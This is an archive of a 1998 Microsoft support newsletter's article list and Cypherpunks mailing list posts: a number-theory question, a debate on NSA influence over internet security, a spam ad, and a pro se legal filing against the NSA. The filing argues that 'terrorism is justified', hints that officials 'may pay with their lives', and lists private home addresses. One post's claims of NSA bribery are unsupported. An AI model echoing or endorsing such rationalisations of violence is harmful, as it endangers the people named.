Mobile Devices Folder Contains Generic H/PC or P/PC Icon (Q190649)
http://support.microsoft.com/support/kb/articles/q190/6/49.asp

Known Issues When You Print Using a Handheld PC (Q190641)
http://support.microsoft.com/support/kb/articles/q190/6/41.asp

Palm-Size PC Downloads Wrong Mobile Channel Content (Q190640)
http://support.microsoft.com/support/kb/articles/q190/6/40.asp

How to Connect Two Windows CE Devices to a Desktop Computer (Q190626)
http://support.microsoft.com/support/kb/articles/q190/6/26.asp

Graphics Shrink When You Convert Them from Word to Pocket Word (Q190570)
http://support.microsoft.com/support/kb/articles/q190/5/70.asp

Cannot Play Wave Audio Files Created on Palm-size PC (Q190559)
http://support.microsoft.com/support/kb/articles/q190/5/59.asp

WinCE Err Msg: There Currently Is a Connection Established... (Q190484)
http://support.microsoft.com/support/kb/articles/q190/4/84.asp

Graphics Lost When You Convert a Pocket Word Document to HTML (Q190479)
http://support.microsoft.com/support/kb/articles/q190/4/79.asp

Windows CE Support for the Euro Currency Symbol (Q190458)
http://support.microsoft.com/support/kb/articles/q190/4/58.asp

WinCE: Cannot Copy File into Folder Icon (Q190456)
http://support.microsoft.com/support/kb/articles/q190/4/56.asp

WinCE: Graphics Are Not Displayed in Pocket PowerPoint Slides (Q190365)
http://support.microsoft.com/support/kb/articles/q190/3/65.asp

Known Issues in Pocket Internet Explorer on a Handheld PC (Q190307)
http://support.microsoft.com/support/kb/articles/q190/3/07.asp


Windows 95
----------

Err Msg: The Server Name You Specified Is Not Valid or Server... (Q190829)
http://support.microsoft.com/support/kb/articles/q190/8/29.asp

Windows 95 Starts Only in Safe Mode After Installing Sound Card (Q190826)
http://support.microsoft.com/support/kb/articles/q190/8/26.asp

Err Msg: SPOOL32 Caused a Divide Error in Module GDI.EXE... (Q190724)
http://support.microsoft.com/support/kb/articles/q190/7/24.asp


Internet Explorer for Unix
--------------------------

Internet Explorer Hangs with Shared Memory Extensions Enabled
http://support.microsoft.com/support/kb/articles/q190/9/10.asp


Get Support Online Articles by E-mail
-------------------------------------

You can also receive these articles (and others) in e-mail by sending a message to mshelp@microsoft.com. In the Subject line of your message
enter the Article-ID number (Qnnnnnn). For example to receive Q162721
your Subject line should resemble the following example:

Subject: Q162721

You can have multiple articles sent to you in e-mail by typing multiple Article-ID numbers separated by a comma. For example:

Subject: Q178049
Q174914
Q174062

To receive an index of articles
enter "Index" (without quotation marks) in the Subject line. For example:

Subject: Index

The MSHelp Index is updated monthly. For more information about MSHelp
see http://support.microsoft.com/support/kb/articles/q183/1/21.asp.

Visit Support Online
--------------------

We also encourage you to visit Support Online at http://support.microsoft.com/support/ to see our complete selection of helpful articles designed to answer questions about using Microsoft products.

Sincerely,
The Support Online staff

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft-sponsored events:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For information on all Microsoft-sponsored events, please visit:
http://events.microsoft.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
How to use this mailing list:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
You received this e-mail newsletter as a result of your registration on the Microsoft.com Personal Information Center. You may unsubscribe from this e-mail newsletter, or subscribe to a variety of other informative e-mail newsletters, by returning to the Personal Information Center at
http://register.microsoft.com/regwiz/personalinfo.asp
and changing your subscription preferences.

Alternatively, please send a reply to this e-mail with the word "unsubscribe" as the first line in the body of the message.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THIS DOCUMENT IS PROVIDED FOR INFORMATIONAL PURPOSES ONLY.  The information contained in this document represents the current view of Microsoft Corporation on the issues discussed as of the date of publication.  Because Microsoft must respond to change in market conditions, it should not be interpreted to be a commitment on the part of Microsoft and Microsoft cannot guarantee the accuracy of any information presented after the date of publication.
INFORMATION PROVIDED IN THIS DOCUMENT IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND FREEDOM FROM INFRINGEMENT.
The user assumes the entire risk as to the accuracy and the use of this document. This  document may be copied and distributed subject to the following conditions:
1.   All text must be copied without modification and all pages must be included
2.   All copies must contain Microsoft's copyright notice and any other notices provided therein
3.   This document may not be distributed for profit




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Olivier Langlois" <olanglois@sympatico.ca>
Date: Tue, 11 Aug 1998 14:25:42 -0700 (PDT)
To: "CypherPunks mailing list" <cypherpunks@toad.com>
Subject: novice needing help
Message-ID: <199808112124.RAA27282@smtp13.bellglobal.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

I just started to read about cryptography and during my readings I found a
small problem
probably not very hard but I just don't know how to solve it. My number
theory knowledge is very limited.

a = b/c and
d = b/(b mod c)

I would like to demonstrate that gcd(a,d) = 1 and a*d>=b for any b and c
values(assuming b mod c != 0) is true or false through
logical induction.

Is there someone that could give me a hint ?

TIA

Olivier Langlois - olanglois@sympatico.ca -
http://www3.sympatico.ca/olanglois
Montreal, Canada




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 11 Aug 1998 17:26:31 -0700 (PDT)
To: mgraffam@mhv.net
Subject: Re: Internet is rickety
In-Reply-To: <Pine.LNX.3.96.980811192209.10796A-100000@albert>
Message-ID: <199808120026.RAA28008@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



MG: it's a question: do you imlement security top down,
or bottom up? which is the top? the internet, or
the computer?

it's very taoist-- I don't think there is a correct answer.

I do think however that crypto *everywhere* over the
internet is a major part of the solution. and yes, NSA
is not fully responsible for the lack of it. the
patent system & greed is involved in some of the deficiency.
but the NSA is responsible for far more than most people
realize. are you aware they regularly visit software
companies developing crypto to squelch any innovation?
basically, through bribes that they call "grants" or
"purchase agreements"...

you're against commerce on the internet? what are you,
a luddite? <g> seriously, I don't have much to say to you,
if you oppose it. the internet is already the backbone of
a new economy. crypto will help secure it further. ask
Ian Golderberg!

>Lets be factual: NSA doesn't regulate authentication technology and
>most of what we need to fix these problems is secure authentication,
>not confidentiality. 

it's an artificial distinction. it's all crypto. standing in
front of any of it is standing in front of all of it. the NSA
doesn't lead, they block. get out of the way!!

you say, a taxpayer of the US should consider himself "getting
his money's worth" out of the NSA if the NSA can crack 2048
bit keys. well hee, hee. that's pretty funny. what if they
find the bazillionth prime number? would you be getting
your money's worth then too? it's the same technology, no?

death to the NSA leeches!!! the US taxpayers have been
submitting to government-originated *bloodletting* for too long







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Tue, 11 Aug 1998 15:46:11 -0700 (PDT)
To: Olivier Langlois <olanglois@sympatico.ca>
Subject: Re: novice needing help
In-Reply-To: <199808112124.RAA27282@smtp13.bellglobal.com>
Message-ID: <Pine.SUN.3.91.980811173637.14510A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 11 Aug 1998, Olivier Langlois wrote:

> a = b/c and
> d = b/(b mod c)

	I'm not sure what you're trying to say with this notation.

	Well, if by '/' you mean integer division with truncation
	(a la most programming languages,) then consider that
	
		 9 = 49/5 and
		12 = 49/(49%5=4) 

	And so gcd(a,d) != 1.  

	This is my best guess as to what you're trying to say, since
	in number-theoretic notation these two statements don't make
	much sense:  division is not closed on the integers, and 
	(b mod c) is not a single integer, but an equivalence class.

							-Caj




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Tue, 11 Aug 1998 15:19:56 -0700 (PDT)
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Internet is rickety
In-Reply-To: <199808112055.NAA01325@netcom13.netcom.com>
Message-ID: <Pine.LNX.3.96.980811180002.10326A-100000@albert>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 11 Aug 1998, Vladimir Z. Nuri wrote:

> if the internet is insecure, blame the real source
> of the problem: the multibillion dollar NSA that
> has a vested interest in keeping the world technology
> weak..

This is absurd. The internet would be insecure even with strong crypto.
Certainly, good crypto would plug up some holes but general internet
technology is full of cracks. All the crypto in the universe won't
stop a buffer overflow in your mail program, or 1000's of nested tags
from crashing your browser in a DoS. 

NSA has nothing to do with bad programming practicies. Crypto is not
the end-all-be-all in overall security. Encrypting your mail does you
little good if I can read the plaintext off of your hard drive. Crypto
is one piece of a secure system, and in some cases it may be the smallest
piece. 

I don't support export restrictions any more than anyone else who is
likely to be on cypherpunks .. but laying all the evils in the universe
at NSA's door is a wee bit irresponsible. 

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"..subordination of one sex to the other is wrong in itself, and now
one of the chief hindrances to human improvement.." John Stuart Mill
"The Subjection of Women"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 44822272@hotmail.com
Date: Tue, 11 Aug 1998 20:25:11 -0700 (PDT)
To: Friend@public.com
Subject: Re: Mail Order Condoms
Message-ID: <Kuyontro>
MIME-Version: 1.0
Content-Type: text/plain



Convenient.....

                      

                               MAIL ORDER CONDOMS!
                     
                 DISCREETLY PACKAGED, CONVENIENT,  FAST DELIVERY!


  PACIFIC COAST MAIL ORDER  Products is now offering ..........
               
                      TROJAN.... AMERICAS #1 BRAND 

  of condoms available discreetly by MAIL ORDER! We FEATURE the 
  most popular style..... 
                        
        

        **** TROJAN-ENZ with spermicidal lubricant! ****

   


   Having condoms EASILY AVAILABLE is essential,
   YET many people do not carry them for VARIOUS reasons.

   Many people are EMBARRASSED to purchase condoms,
   while others do not have easy access to QUALITY condoms.


 WOMEN IN PARTICULAR are
 embarrassed to purchase condoms,
 but many wish to carry them.


 TEENAGERS are especially at risk of sexually transmitted disease
 and unwanted pregnancies as they often do not have easy access 
 to quality condoms.
 

 Regardless of the reason for not having condoms when needed you
 are not only putting yourself, but others in danger of DISEASE and 
 UNWANTED PREGNANCY.


   

           Be Responsible!   Be Safe!   BE SENSIBLE!   

  

 Our research indicates that the #1 SELLING CONDOM IS....
                        
         **** TROJAN-ENZ with spermicidal lubricant! ****

PACIFIC COAST MAIL ORDER is featuring packages of 12 condoms
with 2 additional condoms free (while supplies last, subject to change without notice) and will be shipped in DISCREET packaging the day your order is received! 




                 
                      DISCREETLY PACKAGED!

                      PROMPT DELIVERY!

                      GREAT PRICE!




PLEASE PRINT AND COMPLETE THE FOLLOWING ORDER: 

______ # OF PACKAGES FOR ONLY    $ 8.99 EACH.

______ SHIPPING and HANDLING       $ 2.00 EACH

______ Ca. Residents only (tax)          $   .72 EACH



Mail To:

Name                 ___________________________

Address           ____________________________

City,State,Zip _____________________________



Please Send Check or Money Order to:

Pacific Coast Mail Order
862 Sir Francis Drake Blvd.  #352
San Anselmo,Ca.
94960


Please allow 14 days or for delivery.

Your order will arrive discreetly packaged! 

    


** To be removed from our mailing list please reply to: plsrmv@hotmail.com
   
    Thank You, 
    Jane P. 

























8
4
            



 



















*
*




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 11 Aug 1998 18:36:54 -0700 (PDT)
To: sjmz@hplb.hpl.hp.com
Subject: Curis LeMay theory of responsibility
Message-ID: <35D0F09A.1F4F@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Tuesday 8/11/98 6:56 PM

John Young
J Orlin Grabbe

Morales courtroom outcome today was perhaps most important for the
reason that judge Leroy Hansen dismissed all of the individually-named
defendants in Morales' case.

Hansen cited a Tenth circuit ruling where individually-named defendants
were dismissed.

The tenth circuit decision is monumental in that

1  one can only do discovery on individually-named defendants if some
opinion is correct.  Named parties.

Morales and I squeaked by in our NSA lawsuit because US assistant
attorney did not complain in time.

2  no one is INDIVIDUALLY to blame.  There is only an agency.

The LeMay theory is that EVERYONE is to blame.  This is after general
Curtis. http://www.psispy.com/ufo/people/l/lemay/

The LeMay theory is that if some government is doing something the US
government does not like, then the US begins to kill the citizens of the
errant government.  

Doesn't make any difference what citizens.  All are treated equal.

After the US kills enough citizens, then the errant government stops
whatever offended the US.

2 is opposite the LeMay theory.

Problem is that few believe this.  

Disbelivers revert to the LeMay theory.  Everyone is to blame.

Hence terrorism is justified.

The Allahu Akbar crowd has figured-out this.

Morales and I  are going to ATTEMPT to bring the guilty in our NSA
lawsuit to justice.

Wish us luck.

Later
bill


UNITED STATES COURT OF APPEALS    
       FOR THE TENTH CIRCUIT    
    
William H. Payne        	   	                     )    
Arthur R. Morales                                               )    
                                                                           )    
Appellants Plaintiffs,                                           )    
                                                                           )      98-2156 
v                                                                         )	98-2157    
					       )	    
Lieutenant General Kenneth A. Minihan, USAF )    
Director, National Security Agency	                     )    
National Security Agency		                     )    
                                                                            )    
Appellees Defendants                                           )    
  
RESPONSE TO MOTION FOR EXTENSION OF TIME TO FILE MEMORANDUM BRIEFS 
ADDRESSING JURISDICTIONAL ISSUES
 
1	COMES NOW appellant plaintiffs [Appellants - Plaintiffs] Payne [Payne] and Morales [Morales]     
    
pro se litigants to exercise their rights  guaranteed under the Constitution and Federal Rules of Appellate

Procedure http://www.ca5.uscourts.gov/docs/frap-iop.htm
 
  Any party may file a response in opposition to a motion other than one for procedural order
  [for which see subdivision (b)] within 7 days after service of the motion,  ...

http://www.ca5.uscourts.gov/docs/frap-iop.htm#27 
 
and
 
  FRAP 26c  Additional Time after Service. When a party is required or permitted to act within a prescribed    
  period after service of a paper upon that party, 3 calendar days are added to the prescribed period unless the     
  paper is delivered on the date of service  stated in the proof of service. 

http://www.ca5.uscourts.gov/docs/frap-iop.htm#26c 
 
 MOTION FOR EXTENSION OF TIME TO FILE MEMORANDUM BRIEFS ADDRESSING 
JURISDICTIONAL ISSUES  [MOTION] was served on August 3, 1998 by Jan E Mitchell [Mitchell], 
Assistant US Attorney by mail.  Exhibit A.

2 Mitchell writes

  The Defendant-Appellee, National Security Agency [1], moves this Court for an Order extending the time
  to and including twenty-one (21) days following the date Plaintiffs-Appellants file their memorandum brief
  in which to file it memorandum briefs discussing jurisdictional issue in the above-referenced appeals. ...

    3.  Defendant-Appellee is not seeking an appeal and therefore, will NOT seek a certification for   
  interlocutory appeal from the District Court's memorandum Opinion and Order entered April 30, 1998, nor
  will Defendant-Appellee seek an order explicitly adjudicating all remaining claims.

    4.  On July 22, 1998, Plaintiffs-Appellants were granted an extension until September 1, 1998 to respond to   
  the Court's show cause orders of June 30, 1998.

    5 .  Defendant-Appellee seeks an additional twenty-one (21) days from the date in which Plaintiff's-
  Appellants' memorandum must be served in which to serve the memorandum briefs.  According to the Show 
  Cause Order, if Appellants do not seek and obtain a certification for interlocutory appeal or a final dispositive 
  adjudication concerning appeal N. 9821257, the appeal may be dismissed, in which case a jurisdictional brief 
  would not be required as to that appeal.  Should Plaintiffs-Appellants seek and obtain a certification for 
  interlocutory appeal pertaining to No. 2157, in the interest of economy, Defendant-Appellant seeks to file the 
  two memorandum briefs on the two very related jurisdictional issues at one time.

    6.  Undersigned counsel for Defendant-Appellee has contacted Plaintiff-Appellant William H. Payne who   
  has concurred on his own behalf and own behalf for Plaintiff-Appellant Arthur R. Morales in granting of this   
  motion. ...
 
3  Payne confirms 6 above in  fax

Monday 8/3/98 3:41 PM

  FAX

  Jan Elizabeth Mitchell
  Assistant U.S. Attorney
  U.S. Department of Justice
  United States Attorney
  District of New Mexico
  Post Office Box 607
  Albuquerque, NM 87103
  505/346-7274
  505/766-2868
  FAX 505/346-7205

  Dear Ms Mitchell:

  Purpose of the fax is to 

  1  review points covered in our 8/3/98 14:18 phone conversation
  2  suggest settlement.

  You phoned me today.

  You told me that you planned to file a motion or response to the Tenth circuit's
  request Morales and my response to the jurisdictional issue on the 21st of August.

  I told you that this was premature on your part since we had moved for a second time
  for an extension of time.

  I told you also that this matter was now before congress.

  You appeared to indicate to me that you were in the process of adding both Morales and
  Minihan as named parties in this appeal.

  You asked me if it would be agreeable to us if you filed a response to the Tenth circuit
  21 days AFTER Morales and I filed our response to the Tenth circuit on the jurisdictional
  issue.

  I AGREED.

  I spoke to Morales on the phone shortly after our phone conversation.

  Arguing points of law before court clerks and judges who have outstanding criminal complaint
  affidavits for crimes COMMITTED IN WRITING against them would be unproductive on Morales and my 
  part.

  Therefore, we will proceed to resolve the criminal conduct on the part of judges and court clerks
  before we proceed further in this matter.

  We will do this at the Congressional level.

  Senate Judiciary Committe chairman Orrin Hatch, unfortunately, failed to properly process a valid
  complaint on New Mexico district court chief judge John Conway in 1995.  
  http://www.jya.com/whp071598.htm

  Hatch's failure to properly respond in 1995, in large part, caused our current legal conflict with DIR NSA 
  Minihan.

  We foresee an unfortunate escalation of hostilities if this matter proceeds as it is.  

  We do not wish this.

  We seek settlement of the UNFORTUNATE matter at the earliest time.

  We ask your and Congressional help to settle this UNFORTUNATE matter before it gets WORSE.

  If I have made any essential material errors in reporting my impression of the contents of our conversation, 
  then I would appreciate you giving your impression of possible errors.  

  You can do this in the letter you said you would write to us.

  Sincerely,


  bill payne
  13015 Calle de Sandias NE          	        
  Albuquerque, NM 87111              	        

  Distribution

  Senate Judiciary Committee   e-mail
  Arthur R Morales e-mail			

4  Michell responds to 3 in letter dated August 4, 1998.   Exhibit B

Mitchell writes

    I have received Mr. Payne's FAX dated August 3, 1998 at 4:22.  I want to clarify a few points. ...

    As to the caption of the appeal, I have noted in the motion for extension of time which has been filed with  
  the Tenth Circuit that there was an additional Defendant numbed in the District Court case.  However, I am 
  constrained at the time to use the caption which the Tenth Circuit is reflecting on its pleadings.

  I will forward your FAX suggesting settlement to Defendants.

				Sincerely,

				JOHN J. KELLY
				United States Attorney
				  signature
				JAN ELIZABETH MITCHELL
				Assistant U. S. Attorney


5  Federal Rules of Civil Procedure http://www.law.cornell.edu/rules/frcp/overview.htm  Rule 54(b) states

(b) Judgment Upon Multiple Claims or Involving Multiple Parties.

  When more than one claim for relief is presented in an action, whether as a claim, counterclaim, cross-claim,   
  or third-party claim, or when multiple parties are involved, the court may direct the entry of a final judgment 
  as to one or more but fewer than all of the claims or parties only upon an express determination that there is 
  no just reason for delay and upon an express direction for the entry of judgment. In the absence of such 
  determination and direction, any order or other form of decision, however designated, which adjudicates 
 fewer   than all the claims or the rights and liabilities of fewer than all the parties shall not terminate the   
 action as to  any of the claims or parties, and the order or other form of decision is subject to revision at any
  time before the entry of judgment adjudicating all the claims and the rights and liabilities of all the parties.

Interpretation of meaning of 54(b) is

  RULE 54(b) JUDGMENTS UPON MULTIPLE CLAIMS OR INVOLVING MULTIPLE PARTIES

  CORE CONCEPT
     A judgment entered as to less than all claims in a lawsuit, or as to less than all parties in a lawsuit,
  is not immediately appealable.  Instead, the appeal must generally await the entry of judgment as to all 
   remaining claims and parties.  However, the district court can make a judgment as to less than all claims or 
  parties "final", and thus immediately appeals, by expressly certifying that no just cause exists to delay the 
  appeal and by directing the entry of judgment.

  APPLICATIONS
     Prerequisites to Rule 54(b)

    There are three prerequisites for obtaining an immediately appealable judgment from the district court 
  entered as to less than all claims or parties.

  1:  Multiple Claims or Parties Fully Resolved:  To be eligible for immediate appeal under Rule 54(b), a   
  partial adjudication must either (a) finally resolve at least one claim or (b) finally resolve the rights and 
  liabilities of  at least one party.  A claim or a party's interest MUST be adjudicated to finality, such that there 
  is nothing more to do that claim or that party but await the conclusion of the remaining portion of the 
  litigation.  This limitation is a pivotal one.  Rule 54(b) does not alter the normal rules of appellate finality for 
  individuals claims, and no appeal may be taken from district court ruling or any particular claim until the 
  court finally resolves that claim.

  Multiple claims exist where each claim is factually separate and independent, or where each claim could be 
  enforced separately.

  2:  No just Cause for Delay:  The district court must state, in clear and unmistakable language, that there is  
  no just cause to delay the appeal of the adjudicated claim or the adjudicated right and liability of a party.  
  Whether "just cause" exists is a determination made on a case-by-case basis.  Certain criteria guide the 
  court's consideration:

  o  The relationship between adjudicated and unadjudicated claims;

  o  The possibility that the need for appellate review might be mooted by future developments in district court;

  o  The possibility that the district court might be obligated to consider the same issue on a later occasion;

  o  The presence (or absence) or a claim or counterclaim that could result in a set-off against the judgment 
  now sought to be made final and appealable; and

  o  Other factors, including delay, economic and solvency concerns, shortening of trial time, frivolity or 
  competing claims, and expense.

  3:  Entry of judgment:  In clear and unmistakable language, the district court must also direct that judgment   
  is entered as to that one claim or one party.

  Explanation by the District Court

    In its order entering a Rule 54(b) judgment, the district court must clearly explain why it has concluded that 
  an immediate appellate review of that order is advisable.

  Burden of Proof

    The moving party bears the burden of establishing that a partial judgment should be entered under Rule 
  54(b).

  Discretion of District Judge

    Whether to enter a judgment under Rule 54(b) is reserved to the sound discretion of the district judge.  Such    
  arguments are contrary to the historic federal policy against piecemeal appeals.  For this reason, Rule 54(b) 
  orders are not granted routinely or an accommodation to counsel.  Instead, the district court must carefully 
  balance the needs of the parties for an immediate appeal against the interests of efficient management of the 
  litigation.

   Motions for Rule 54(b) Judgments

    A party may file a motion with the court to certify under Rule 54(b), or the court may do so on its own 
  initiative.

  Effects of Rule 54(b) Judgments

    Once entered, the time for appeal on the judgment begins to run, and does post-judgment interest.

  Appealability of Denials for Rule 54(b) Requests

    Allowing immediate appellate review of "partial" final judgments is a practice that departs from the federal
  courts' traditional opposition to piecemeal appeals.  Rule 54(b), thus, represents an unusual exception to this 
  settled policy.  Predictably, the court reject immediate attempt to challenge denials of Rule 54(b) judgments   
  as premature and unappealable until a final ruling his entered on the merits.

   Federal Civil Rules Handbook  1996, Baicker-McKee, Janssen, Corr, West Publishing Company

6  Appellants-Plaintiffs assert that there is NO REASON to seek a Rule 54 (b) certification for the 

REASON THAT New Mexico district judge Santiago Campos [Campos] already issued such certification.

FACT 1   4 May 1998  Campos writes

  NOW, THEREFORE, IT IS ORDERED that sua sponte, Defendant is DEEMED by the Court to be the NSA, 
  and not Lt. Gen. Kenneth A. Minihan. Future captions for this case should reflect this change.

  IT IS FURTHER ORDERED that Defendant's Motion to Dismiss Plaintiff Morales is GRANTED.

 http://jya.com/whp043098.htm

1: [A] claim or a party's interest MUST be adjudicated to finality ... has been satisfied.

FACT 2   2:  is satisfed.   [N]o just Cause for Delay:  

Dismissing Minihan and Morales have nothing to do with the remaining claims of whether AppelleeS-

DefendantS Minihan and NSA provide lawfully requested documents on

	1  Iran messages given to Iraq during the Iraq/Iran war. http://www.aci.net/kalliste/speccoll.htm
	    http://caq.com/cryptogate
              2  Libyan message intercepted by the US
	3  deficient NSA cryptographic algorithms

FACT 3    3: In clear and unmistakable language, the district court must also direct that judgment   
                     is entered as to that one claim or one party.

  NOW, THEREFORE, IT IS ORDERED that sua sponte, Defendant is DEEMED by the Court to be the NSA, 
  and not Lt. Gen. Kenneth A. Minihan. Future captions for this case should reflect this change.

  IT IS FURTHER ORDERED that Defendant's Motion to Dismiss Plaintiff Morales is GRANTED.

   http://jya.com/whp043098.htm is QUITE CLEAR.

FACT 4   Motions for Rule 54(b) Judgments

    A party may file a motion with the court to certify under Rule 54(b), or the court may do so on its own 
    initiative.

Campos issues Rule 54(b) certification ON HIS OWN INITIATIVE.

     However, I shall await decision on the appeals before the Tenth circuit prior to setting a date for   
     presentment of the classified Declaration or before taking any further action in this case.

FACT 5  Therefore, no Rule 54(b) certification needs to be sought by Appellants-Plaintiffs.

7  Campos did not explicitly state in Campos's June 29, 1998 letter http://jya.com/sec062998.htm

or in Campos' MEMORANDUM OPINION AND ORDER http://jya.com/whp043098.htm that a 

Rule 54(b) decision was issued.  Therefore, Appellants-Plaintiffs seek to clarify Campos intention
    
  Wednesday 8/11/98

  Certified   Return receipt requested 

  Santiago E. Campos, Senior Judge
  P.O. Box 2244
  U.S. Courthouse
  South Federal Place
  Santa Fe, NM 87504-2244

  Re: William H. Payne v. National Security Agency
  Civ. No. 97-0266 SC/DJS

  Dear Judge Campos,

  We assume that your statement

    However, I shall await decision on the appeals before the Tenth circuit prior to setting a date for   
    presentment of the classified Declaration or before taking any further action in this case.

 in your June 29, 1998 letter seen at http://jya.com/sec062998.htm is a sua sponte Rule 54(b) certification
 for immediate appeal.

  If we are incorrect in our assumption, then we ask that you write us and explain why we would need to 
  wait to appeal.

  Clearly we have satisfied the three conditions required for immediate appeal which we are sure you are
  acquainted.  

  If not, however,  these conditions are included  in Federal Civil Rules Handbook  1996, Baicker-McKee,   
  Janssen, Corr, West Publishing Company

  Also, we would ask that you justify seeking permission for appeal from a judge who has issued a  
  MEMORANDUM OPINION AND ORDER when appellants have satisfied Rule 54(b) conditions if you   
  choose to respond negative.

  If we do not hear from you Monday August 31, 1998, then we will treat our assumption as correct.

  Sincerely

  
  William H. Payne             	   	 Arthur R. Morales
  13015 Calle de Sandias NE          	               1024 Los Arboles NW
  Albuquerque, NM 87111              	 Albuquerque, NM 87107       
    
 8  Appellants-Plaintiffs receive   Exhibit C

  UNITED STATES COURT OF APPEALS 
  FOR THE TENTH CIRCUIT 
 
  WILLIAM H. PAYNE; ARTHUR R. 
  MORALES 
					Nos. 98-2156 
    	Plaintiff - Appellants,		        98-2157 
 
  NATIONAL SECURITY AGENCY, 
             Defendant - Appellee. 


                                ORDER
		Filed August 6, 1998

    The appellants and appellee are granted additional time until September 21, 1998
  to this court's show cause order of June 30, 1998.  All other requests contained in the
  appellants; motion filed August 4, 1998 are referred to the panel of judges who will hear
  this case on the merits.

			Entered for the Court
			PATRICK FISHER, Clerk of Court

			by: signature Randy Simmons?
  			Deputy Clerk

A  Hearing MUST be corrected to include defendant Minihan.

B  Clerk FISHER has not addressed his removal from the appeal for previous title 18 felony violations of

law.

C  ORDER does not address selection of three judge panel so not to include judges accused of Title 18 felony

violations of law or biased judges.

WHEREFORE    

9  CORRECT ORDER Filed August 6, 1998 to include NSA Director Minihan. for reason

              1  Find out who is RESPONSIBLE  
	2  Hold them ACCOUNTABLE 
	3  Hold them individually and their agency FINANCIALLY LIABLE   

Possiblity exists that some may pay with their lives for http://www.aci.net/kalliste/speccoll.htm   
http://caq.com/cryptogate  http://jya.com/whpfiles.htm if this matter is NOT PEACEFULLY SETTLED.

10  EXPLICITLY RESPOND to request for removal of clerks FISHER and Hoecker from this appeal.

11  EXPLAIN how an unbiased panel of judges can be found at the Tenth circuit.

Respectfully submitted,    
    
    
   
                    William H. Payne             	   	        
                    13015 Calle de Sandias NE          	        
                    Albuquerque, NM 87111              	        
    
 			   
                       
                    Arthur R. Morales                               
                    1024 Los Arboles NW                            
                    Albuquerque, NM 87107                           
    
                    Pro se litigants    
    
    
               CERTIFICATE OF SERVICE    
    
I HEREBY CERTIFY that a copy of the foregoing response and motion   
was mailed to Lieutenant General Kenneth A. Minihan, USAF,    
Director,  National Security Agency, National Security Agency,    
9800 Savage Road, Fort George G. Meade, MD 20755-6000    
and mailed to Jan E Mitchell, Assistant US Attorney,    
9 Floor, Bank of America Building, 3rd and Tijeras, ABQ, NM 87102    
an original and three copies as required by FRAP 27(d)    
http://www.ca5.uscourts.gov/docs/frap-iop.htm#27d United States Court of    
Appeals for the Tenth Circuit, 1823 Stout Street, Denver, Co 80257 by CERTIFIED     
RETURN RECEIPT REQUESTED mail August 11, 1998.   



9






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Tue, 11 Aug 1998 17:15:47 -0700 (PDT)
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Internet is rickety
In-Reply-To: <199808112327.QAA21344@netcom13.netcom.com>
Message-ID: <Pine.LNX.3.96.980811192209.10796A-100000@albert>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 11 Aug 1998, Vladimir Z. Nuri wrote:

> you will find most people here will disagree with you.
> cyberspace is very, very weak without crypto. when you
> think about it, 98% of cyberspace is the "stuff between
> the wires". the other 2% are the people on each end.
> now, crypto protects the 98%, but agreed, the 2% is
> still vulnerable.

I never said that the internet would be great without crypto. Crypto
is needed. As long as we are quoting percentages, "87% of statistics is
made up on the fly." 

Seriously, protecting the internet entails more than securing data
transmission, as you imply. 

Explain to me the difference between having a broken web browser that
is vunerable to a buffer overflow attack, and a broken browser that
implements snake-oil crypto?

In both cases we need better programs on the user's end. The ends of
the communication link define the communication itself. You can't
protect the middle without modifying the ends.


> >Certainly, good crypto would plug up some holes but general internet
> >technology is full of cracks. All the crypto in the universe won't
> >stop a buffer overflow in your mail program, or 1000's of nested tags
> >from crashing your browser in a DoS. 
> 
> this is nothing anyone cares about in the cyberspatial world.

You're right about that.. and that is _exactly_ the problem. As I see
it, the primary function of the internet is to communicate, to exchange
information. As such, any security we talk about is going to be
information security. A secure information system not only keeps
unauthorized users out, but it must insure that authorized users can
get to the information when they need it. This means that DoS attacks
are part of our security concerns, just as much as crypto is in keeping
the transmission secret, and authorization is to keep unwanted people
out of the loop. 

> these are thing that happen outside of cyberspace.

I'm not exactly sure what 'cyberspace' is, anyhow.. so I'm just going
to ignore this. It sounds like you mean to tell me that the internet
is just a bunch of wires.. that the only security issues the internet
faces is in the area data transmission. This is false. 

Encryption prevents eavesdropping, yes. This is the only area that
NSA regulates. In reality, the internet faces other, more fundamental
problems as well. The idea of using crypto to fix a problem such a
TCP/IP hijacking is bizarre to me. This is not the optimal solution,
and everyone knows it. It _is_ however, the best practical solution.
Pure encryption is (ie, confidentiality) is not needed for this. A MAC
will suffice.

Internet security runs far deeper than confidentiality.

> the bigtime issue is internet
> commerce, security of your mail. how about if someone reads your
> mail to steal your money?

In my opinion commerce over the internet is insane. Period. Let me
say it again: commerce over the internet is insane. Even if Uncle
Sam let us use any crypto we like with any key size, it is still insane.
There are too many problems with the fundamental network structure.
Confidentiality doesn't help us here. 

Lets be factual: NSA doesn't regulate authentication technology and
most of what we need to fix these problems is secure authentication,
not confidentiality. 

